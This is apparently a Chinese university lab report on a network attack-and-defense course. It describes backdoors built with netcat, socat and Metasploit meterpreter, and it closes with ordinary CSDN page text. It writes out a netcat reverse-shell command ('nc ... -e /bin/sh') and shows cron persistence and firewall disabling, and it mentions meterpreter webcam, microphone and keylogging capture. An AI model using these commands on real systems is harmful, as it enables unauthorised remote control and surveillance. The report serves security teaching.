20202418 2022-2023-2 《网络与系统攻防技术》实验二实验报告

这篇实验报告详细介绍了如何利用netcat、socat和MSF meterpreter在Linux和Windows系统中创建和植入后门,包括启动后门的不同方式、Meterpreter的功能演示,以及如何检测系统是否存在后门。此外,还讨论了实验中遇到的问题和解决方案。
摘要由CSDN通过智能技术生成

20202418 2022-2023-2 《网络与系统攻防技术》实验二实验报告

1.实验内容

1.1 实践目标

(1)使用netcat获取主机操作Shell,cron启动某项任务(在1.txt文件中写入1)
(2)使用socat获取主机操作Shell,任务计划启动
(3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

1.2 回答问题

(1)例举你能想到的一个后门进入到你系统中的可能方式?

社会工程学攻击,将后门软件伪装成市场上常见的APP,通过邮件、U盘等方式发送至受害者的电脑上。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

linux:自动启动(比如实验用到的cron)自主注册为系统服务,通过反弹式连接到客户端然后攻击者通过恶意控制启动后门
win:添加到任务计划程序、修改注册表,还能和某个的程序绑定启动

(3)Meterpreter有哪些给你映像深刻的功能?

能够轻而易举的获得目标主机的摄像头和麦克风权限,还能够进行截屏,获得键盘记录等,甚至能够尝试提权,让人感慨。

(4)如何发现自己有系统有没有被安装后门?

使用杀毒软件进行扫描,用任务管理器查看是否有可疑软件在后台运行,查看任务表中是否有可以的任务。

2 实验过程

2.1 使用netcat获取主机操作Shell,cron启动某项任务(在1.txt文件中写入1)

2.1.1 关闭Linux系统的防火墙

关闭防火墙需要在Linux系统中安装ufw。

sudo apt-get install ufw
ufw disable

在这里插入图片描述

2.1.2 在cmd中取得Linux的shell

如图所示,在Linux中输入如下指令开启监听

nc windows主机地址 windows主机端口 -e /bin/sh(其中/bin/sh代指执行shell)

在windows中输入

nc -l -p 2418

便能够在cmd中获得linux的shell

在这里插入图片描述

2.1.3 在cmd中添加定时任务

如上图所示,获取过root权限之后便可利用echo重定位写入到root文件中。但是在cmd中不会返回是否登陆成功,因此我们使用id这个指令,便可查看你的权限目前是不是在root中。
五个*代表每过1分钟就执行一次指令,将1写入到1.txt文件中。
使用crontab -l可以查看当下有哪些指令

2.1.4 查看是否成功

等过一分钟后,打开1.txt文档,便可发现多了个1。如果一直打开,一会linux还会提示文件内容发生改变,要求重启文件查看的提示。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值